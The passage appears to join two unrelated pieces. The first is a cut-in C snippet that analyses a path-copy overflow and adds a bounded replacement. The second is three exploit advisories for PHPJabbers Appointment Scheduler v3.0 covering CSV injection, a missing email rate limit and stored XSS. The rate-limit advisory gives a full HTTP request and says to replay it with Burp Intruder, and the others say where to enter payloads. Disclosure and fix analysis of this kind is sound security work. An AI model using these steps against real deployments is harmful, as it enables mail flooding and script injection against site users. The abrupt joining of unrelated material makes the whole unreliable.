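int original_length_check(const char *path)
{
    return strlen(path) + TD_PATH_EXTRA < TD_PATH_MAX;
}

/* Bytes an unbounded strcpy(file_name_buf, path) would write. */
size_t unbounded_copy_size(const char *path)
{
    return strlen(path) + 1;   /* characters plus the terminating NUL */
}

/* Bounded replacement for the strcpy + dirname/basename sequence (an
 * assumption of this example, not TinyDir's fix): the components are
 * located inside the original string and copied only if they fit their
 * destination. Trailing slashes are ignored as basename(3) does.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG otherwise. */
int split_path_checked(const char *path, char *dir_out, size_t dir_sz,
                       char *base_out, size_t base_sz)
{
    size_t len = strlen(path);
    if (len == 0 || dir_sz < 2 || base_sz < 2 ||
        len + TD_PATH_EXTRA >= dir_sz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    size_t end = len;                       /* one past the base name */
    while (end > 1 && path[end - 1] == '/')
        end--;
    if (end == 1 && path[0] == '/') {       /* root directory */
        strcpy(dir_out, "/");
        strcpy(base_out, "/");
        return 0;
    }
    size_t start = end;                     /* first char of the base name */
    while (start > 0 && path[start - 1] != '/')
        start--;
    size_t base_len = end - start;
    if (base_len >= base_sz) {              /* the check the original lacks */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(base_out, path + start, base_len);
    base_out[base_len] = '\0';

    if (start == 0) {                       /* no directory part: "." */
        strcpy(dir_out, ".");
        return 0;
    }
    size_t dir_end = start;                 /* drop the separating slashes */
    while (dir_end > 1 && path[dir_end - 1] == '/')
        dir_end--;
    memcpy(dir_out, path, dir_end);         /* dir_end < dir_sz by the first check */
    dir_out[dir_end] = '\0';
    return 0;
}

/* Constructed input with the PoC's shape: two 255-character components,
 * each followed by '/', 512 characters in total. Returns the length. */
size_t build_poc_path(char *out, size_t out_sz)
{
    if (out_sz < 513)
        return 0;
    memset(out, 'A', 512);
    out[255] = '/';
    out[511] = '/';
    out[512] = '\0';
    return 512;
}

int main(void)
{
    char path[TD_PATH_MAX], dir[TD_PATH_MAX], base[TD_FILENAME_MAX];
    build_poc_path(path, sizeof path);
    printf("admitted by the original check: %d\n", original_length_check(path));
    printf("bytes an unbounded copy writes:  %zu (buffer is %d)\n",
           unbounded_copy_size(path), TD_FILENAME_MAX);
    if (split_path_checked(path, dir, sizeof dir, base, sizeof base) == 0)
        printf("bounded split: dir %zu chars, base %zu chars\n",
               strlen(dir), strlen(base));
    return 0;
}
```

The PoC path itself is legal on Linux (each component is 255 characters, within NAME_MAX), which is why the bounded split accepts it: the defect is not the input but copying the entire path into a buffer sized for one component. A base name longer than the destination is the case the added check rejects.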
<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48841<br /><br />Description:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to CSV injection,<br />which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, then click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48841)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48840<br /><br />Description:<br />PHPJabbers Appointment Scheduler v3.0 does not enforce rate limiting on its email-sending action.<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSend HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 426<br />Origin: https://demo.phpjabbers.com<br />Referer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettings<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send the request to Intruder (Burp Suite), configure the attack, click Start Attack, and check the mailbox.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple Stored XSS<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48839<br /><br />Description:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to multiple stored<br />cross-site scripting (XSS) issues. Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server. Unlike reflected XSS, where the<br />malicious script is embedded in a URL and executed immediately, stored<br />XSS involves the persistent storage of the malicious script on the<br />target server, waiting for unsuspecting users to access the<br />compromised content.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to the System menu, then click SMS Settings.<br />4. Enter an XSS payload in the "SMS API Key" or "Default Country Code"<br />input field and click Save.<br />5. A popup will appear.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48839)<br /></code></pre>